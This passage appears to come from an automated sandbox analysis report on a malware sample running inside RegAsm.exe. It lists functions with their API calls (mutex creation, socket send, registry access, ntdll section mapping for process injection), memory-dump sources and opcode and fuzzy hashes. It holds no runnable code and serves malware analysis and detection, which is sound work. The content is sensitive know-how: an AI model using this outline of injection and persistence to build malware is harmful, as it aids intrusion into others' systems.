                                                                        • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                                        • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                                                                        Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                                                        • GetLastError.KERNEL32 ref: 0040D083
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateErrorLastMutex
                                                                        • String ID: Rmc-R2I0JW
                                                                        • API String ID: 1925916568-2751493137
                                                                        • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                                        • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                                                        • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                                        • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                                                        Function 1000C7A7 Relevance: 4.6, APIs: 3, Instructions: 100COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                          • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                          • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                          • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModuleProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 2905821283-0
                                                                        • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                        • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                        • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                        • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                        Function 00404AA1 Relevance: 4.6, APIs: 3, Instructions: 93synchronizationnetworkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                        • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EventObjectSingleWaitsend
                                                                        • String ID:
                                                                        • API String ID: 3963590051-0
                                                                        • Opcode ID: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
                                                                        • Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
                                                                        • Opcode Fuzzy Hash: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
                                                                        • Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4
                                                                        Function 1000C803 Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                        • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                        • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual$HandleModule
                                                                        • String ID:
                                                                        • API String ID: 3519776433-0
                                                                        • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                        • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                        • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                        • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                        Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                        • RegQueryValueExA.KERNEL32 ref: 004135E7
                                                                        • RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3677997916-0
                                                                        • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                                        • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                                                        • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                                                        • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                                                        Function 004136F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                                                        • RegQueryValueExA.KERNEL32 ref: 0041372D
                                                                        • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3677997916-0
                                                                        • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                        • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                                                        • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                                                        • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                                                        Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                                        • RegQueryValueExA.KERNEL32 ref: 00413587
                                                                        • RegCloseKey.KERNEL32(?), ref: 00413592
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3677997916-0
                                                                        • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                        • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                                                        • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                        • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                                                        Function 004134FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413516
                                                                        • RegQueryValueExA.KERNEL32 ref: 0041352A
                                                                        • RegCloseKey.KERNEL32(?), ref: 00413535
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID:
                                                                        • API String ID: 3677997916-0
                                                                        • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                        • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                                                        • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                        • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                                                        Function 00413877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                        • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                                        • RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseCreateValue
                                                                        • String ID:
                                                                        • API String ID: 1818849710-0
                                                                        • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                        • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                                                        • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                        • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                                                        Function 00418568 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004180EF: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                                          • Part of subcall function 004180EF: GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                                          • Part of subcall function 004180EF: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                                          • Part of subcall function 004180EF: GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                                          • Part of subcall function 004180EF: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                                          • Part of subcall function 004180EF: GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                                          • Part of subcall function 004180EF: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                                          • Part of subcall function 004180EF: GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                                          • Part of subcall function 004180EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                                          • Part of subcall function 004180EF: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                                        • CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                                        • CloseHandle.KERNEL32(t^F), ref: 00418587
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                                                        • String ID: t^F
                                                                        • API String ID: 2948481953-389975521
                                                                        • Opcode ID: 247fee8f8bf52748d850bc295b8f4d78ccc0daa5e201679a7bea01e83cf232d2
                                                                        • Instruction ID: f5f9b7b4b8a2ed15acd0e1e17f357bf619fd4f1f7ce3194d250e30b15390ff54
                                                                        • Opcode Fuzzy Hash: 247fee8f8bf52748d850bc295b8f4d78ccc0daa5e201679a7bea01e83cf232d2
                                                                        • Instruction Fuzzy Hash: E7D05E75C4120CFFCB006BA4EC0A8AEBB7CFB09201B4001AAFC2442253AB329818CA64
                                                                        Function 0044EDC4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Info
                                                                        • String ID:
                                                                        • API String ID: 1807457897-3916222277
                                                                        • Opcode ID: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                                                                        • Instruction ID: 44bbd8f54034b75cb3f6f6e84f1b5a7d7ac270184ed4e74474e217fcd589b3ab
                                                                        • Opcode Fuzzy Hash: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                                                                        • Instruction Fuzzy Hash: 74411E705043489AEF218F65CC84AF7BBB9FF45308F2408EEE59A87142D2399E45DF65
                                                                        Function 10006ACB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Info
                                                                        • String ID:
                                                                        • API String ID: 1807457897-3916222277
                                                                        • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                        • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                                                                        • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                                                                        • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                                                                        Function 00409DE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _wcslen
                                                                        • String ID: pQG
                                                                        • API String ID: 176396367-3769108836
                                                                        • Opcode ID: e8998cf28dcd9718db14c62255f57e315091e6a51e3e070f68c79c0d4cc3fbb9
                                                                        • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                                                        • Opcode Fuzzy Hash: e8998cf28dcd9718db14c62255f57e315091e6a51e3e070f68c79c0d4cc3fbb9
                                                                        • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                                                        Function 00448BB3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: String
                                                                        • String ID: LCMapStringEx
                                                                        • API String ID: 2568140703-3893581201
                                                                        • Opcode ID: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                                                                        • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                                                                        • Opcode Fuzzy Hash: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                                                                        • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                                                                        Function 10005F19 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: String
                                                                        • String ID: LCMapStringEx
                                                                        • API String ID: 2568140703-3893581201
                                                                        • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                        • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                                                                        • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                                                                        • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                                                                        Function 00448A84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF
                                                                        Strings
                                                                        • InitializeCriticalSectionEx, xrefs: 00448A9F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CountCriticalInitializeSectionSpin
                                                                        • String ID: InitializeCriticalSectionEx
                                                                        • API String ID: 2593887523-3084827643
                                                                        • Opcode ID: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                                                                        • Instruction ID: 658be74961f29c719de8c28810f5b4ff6aac6a213607643c1e3aaf487ccb6ecc
                                                                        • Opcode Fuzzy Hash: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                                                                        • Instruction Fuzzy Hash: 12F0E235640208FBCF019F51DC06EAE7F61EF48722F10816AFC096A261DE799D25ABDD
                                                                        Function 00448710 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Alloc
                                                                        • String ID: FlsAlloc
                                                                        • API String ID: 2773662609-671089009
                                                                        • Opcode ID: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                                                                        • Instruction ID: c1fb2f6f3e96c04a711f36652bc0978b46922b6b0bac1ff16f6cb7e5114ce70e
                                                                        • Opcode Fuzzy Hash: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                                                                        • Instruction Fuzzy Hash: 98E02B30640218E7D700AF65DC16A6EBB94CF48B12B20057FFD0557391DE786D0595DE
                                                                        Function 10005D5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Alloc
                                                                        • String ID: FlsAlloc
                                                                        • API String ID: 2773662609-671089009
                                                                        • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                        • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                        • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                                                                        • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                                        Function 00438D94 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • try_get_function.LIBVCRUNTIME ref: 00438DA9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: try_get_function
                                                                        • String ID: FlsAlloc
                                                                        • API String ID: 2742660187-671089009
                                                                        • Opcode ID: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                                                                        • Instruction ID: 997240ade825b32cd49e327dc5ad0f79abc42783939d358afc793268dfa947f7
                                                                        • Opcode Fuzzy Hash: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                                                                        • Instruction Fuzzy Hash: 1FD05B31B8172866861036D56C02B99F654CB45BF7F14106BFF0875293999D581451DE
                                                                        Function 10003AF1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
